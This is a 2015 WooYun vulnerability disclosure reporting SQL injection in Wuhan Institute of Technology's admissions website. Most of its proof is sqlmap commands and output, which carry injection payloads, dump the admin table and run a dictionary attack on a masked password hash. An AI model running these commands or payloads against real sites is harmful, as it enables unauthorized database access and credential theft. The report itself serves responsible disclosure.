当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150408

漏洞标题:武汉工程大学招生信息网存在Sql注入漏洞

相关厂商:CCERT教育网应急响应组

漏洞作者: Cizel

提交时间:2015-10-30 11:03

修复时间:2015-11-04 11:04

公开时间:2015-11-04 11:04

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

武汉工程大学招生信息网存在Sql注入漏洞,可以拿到最高管理员账号

详细说明:

武汉工程大学招生信息网(http://**.**.**.**:8081/)存在Sql注入漏洞
通过Sql注入可以拿到最高管理员账号

捕获1.PNG

漏洞证明:

Sql注入点:http://**.**.**.**:8081/about.jsp?about_id=21

$python sqlmap.py -u "http://**.**.**.**:8081/about.jsp?about_id=21"
[16:52:42] [INFO] using 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\session' as session file
[16:52:42] [INFO] testing connection to the target url
[16:52:42] [INFO] testing if the url is stable, wait a few seconds
[16:52:43] [INFO] url is stable
[16:52:43] [INFO] testing if GET parameter 'about_id' is dynamic
[16:52:43] [INFO] confirming that GET parameter 'about_id' is dynamic
[16:52:43] [INFO] GET parameter 'about_id' is dynamic
[16:52:43] [INFO] heuristic test shows that GET parameter 'about_id' might be injectable (possible DBMS: MySQL)
[16:52:43] [INFO] testing sql injection on GET parameter 'about_id'
[16:52:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:52:43] [INFO] GET parameter 'about_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:52:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:52:46] [INFO] GET parameter 'about_id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[16:52:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:52:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:53:10] [INFO] GET parameter 'about_id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[16:53:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:53:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'about_id' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: about_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: about_id=21 AND 4339=4339
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: about_id=21 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,117,98,58),(SELECT (CASE WHEN (1114=1114) THEN 1 ELSE 0 END)),CHAR(58,115,100,119,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: about_id=21 AND SLEEP(5)
---
[17:01:09] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[17:01:09] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 25 times
[17:01:09] [INFO] Fetched data logged to text files under 'D:\Documents\Desktop\sqlmap\output\**.**.**.**'
[*] shutting down at: 17:01:09
python sqlmap.py -u "http://**.**.**.**:8081/about.jsp?about_id=21" -D zhaosheng -T admin -C charge,id,password,username --dump
[*] starting at: 17:02:16
[17:02:16] [INFO] using 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\session' as session file
[17:02:16] [INFO] resuming injection data from session file
[17:02:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:02:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: about_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: about_id=21 AND 4339=4339
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: about_id=21 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,117,98,58),(SELECT (CASE WHEN (1114=1114) THEN 1 ELSE 0 END)),CHAR(58,115,100,119,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: about_id=21 AND SLEEP(5)
---
[17:02:16] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[17:02:16] [INFO] fetching columns 'charge, id, password, username' entries for table 'admin' on database 'zhaosheng'
[17:02:16] [INFO] the SQL query used returns 1 entries
[17:02:16] [INFO] retrieved: 3
[17:02:16] [INFO] retrieved: 4
[17:02:16] [INFO] retrieved: ********************************
[17:02:16] [INFO] retrieved: admin
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] Y
[17:02:19] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [D:\Documents\Desktop\sqlmap\txt\wordlist.txt]
[17:02:20] [INFO] loading dictionary from: 'D:\Documents\Desktop\sqlmap\txt\wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] N
[17:02:23] [INFO] starting dictionary attack (md5_generic_passwd)
[17:02:23] [WARNING] no clear password(s) found
Database: zhaosheng
Table: admin
[1 entry]
+--------+----+----------------------------------+----------+
| charge | id | password | username |
+--------+----+----------------------------------+----------+
| 3 | 4 | ******************************** | admin |
+--------+----+----------------------------------+----------+
[17:02:23] [INFO] Table 'zhaosheng.admin' dumped to CSV file 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\dump\zhaosheng\admin.csv'
[17:02:23] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 5 times
[17:02:23] [INFO] Fetched data logged to text files under 'D:\Documents\Desktop\sqlmap\output\**.**.**.**'


捕获2.PNG


修复方案:

对导航链接和文章链接进行Sql过滤处理

版权声明:转载请注明来源 Cizel@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-04 11:04

厂商回复:

最新状态:

暂无